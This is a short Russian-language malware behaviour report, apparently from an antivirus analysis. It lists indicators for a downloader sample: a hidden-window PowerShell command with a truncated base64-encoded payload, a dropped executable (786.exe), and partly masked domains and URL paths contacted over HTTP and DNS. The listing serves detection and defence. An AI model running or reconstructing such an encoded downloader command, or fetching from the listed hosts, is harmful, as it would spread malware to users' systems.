Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAFEAQQBjAFgAQQAgAD0AIAAnADcAOAA2ACcAOwAkAHQAUQBBAG8ARABBAEQAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAFoARAAnACwAJwBBADQAQQBEACcALAAnAFQAJwApADsAJAB6AG8AbwBBAEQAUQBBAD0AJABlAG4AdgA6AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1367723.cvr
- %HOMEPATH%\786.exe
- %HOMEPATH%\786.exe
- 'me####latlantic.com':80
- 'we#####osspalace.com':80
- http://me####latlantic.com/dexter/mqn/
- http://we#####osspalace.com/hlwk49gos/P2l9H/
- DNS ASK gu####asgeir.com
- DNS ASK me####latlantic.com
- DNS ASK we#####osspalace.com
- DNS ASK in######chsolutionsph.com
- DNS ASK te###hao.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAFEAQQBjAFgAQQAgAD0AIAAnADcAOAA2ACcAOwAkAHQAUQBBAG8ARABBAEQAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAFoARAAnACwAJwBBADQAQQBEACcALAAnAFQAJwApADsAJAB6AG8AbwBBAEQAUQBBAD0AJABlAG4AdgA6AH...' (со скрытым окном)